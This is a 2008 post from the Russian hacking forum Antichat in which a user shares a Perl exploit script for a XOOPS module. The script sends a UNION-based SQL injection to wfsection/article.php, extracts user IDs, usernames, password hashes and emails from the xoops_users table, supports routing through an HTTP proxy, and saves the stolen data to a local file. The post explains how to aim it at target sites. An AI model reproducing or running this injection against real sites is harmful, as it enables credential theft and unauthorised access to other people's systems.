Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   [xoops - Exploit] (https://forum.antichat.xyz/showthread.php?t=70114)

.Slip 12.05.2008 23:54
[xoops - Exploit]
 
Вложений: 1
Бывший 0дэй в пределах моего харда (мб). Сейчас уже актуальность утеряна, стало быть выкладываю сюда. Писал не особо кропотливо, любители доебаться к коду -> go2cock. Есть поддержка хттп проксей, онли хттп ибо не хотелось ебли со скачкой доп либ для соксов (у меня их небыло=\). А уж LWP полный есть уже у всех имхо.

Код:
#!/usr/bin/perl

use LWP::UserAgent;
&header;

        if((@ARGV<1) or (@ARGV>2)){&usage;}
        my $url=$ARGV[0];
                if(!$ARGV[1]){print "\n\n[!] Exploit works without proxy!";}
                else {$proxy=$ARGV[1]; print "\n\n[+] Exploit works with proxy: ",$ARGV[1];}

        print "\n[~] Trying get uid, uname, pass, email\n";

        $ua=LWP::UserAgent->new or die;
        $ua->agent("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)");
               
                if($proxy){$ua->proxy('http',"http://".$proxy."/");}

        my $omfg = $ua->get("http://$url/wfsection/article.php?articleid=-28+union+select+1,2,3,concat(0x232323,uid,0x3a,uname,0x3a,pass,0x3a,email,0x232323),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+xoops_users+limit+0,1--")->content;
        $omfg =~m%###(.*?)###%i;
        my $bla = $1;
       
        if (!$bla) {print "[!] Exploit Failed!\n";}
        else {print "[+] Complete!\n\n [uid:uname:pass:email]\n";
              print $bla;
              open (F,">","omfg.txt") or die "$!";
              print F $bla,"\n\nHave Fun, hacker:d\n\n[h0mepage: slip.netsec.ru, email: dotSlip@slip.netsec.ru]";
              close F;}

        sub header
        {print q(
              _        _                _____ _ _     
              | |      | |              / ____| (_)     
  ___ ___  __| | ___  | |__  _  _    | (___ | |_ _ __ 
 / __/ _ \ / _` |/ _ \ | '_ \| | | |    \___ \| | | '_ \
| (_| (_) | (_| |  __/ | |_) | |_| |  _ ____) | | | |_) |
 \___\___/ \__,_|\___| |_.__/ \__, | (_)_____/|_|_| .__/
                              __/ |              | |   
                              |___/              |_|
                             
[h0mepage: slip.netsec.ru, email: dotSlip@slip.netsec.ru])}
       
sub usage{
print q(
usage:          perl expl.pl <url> <proxy>

example:  perl expl.pl www.site.hosting1.com/modules 127.0.0.1:81

or:          perl expl.pl www.site.hosting1.com/modules - without proxy);
exit(0);
}
Впринципе в usage всё понятно описано, но добавлю, ОБЯЗАТЕЛЬНО написать путь до папки с модулями, именно в таком виде как написанное в usage. Если напишите не так, нихера не будет работать. Так же результаты хэка сохраняет в файл omfg.txt в той директории, откуда был запущен скрипт. В аттаче сам сплойт.


Время: 11:42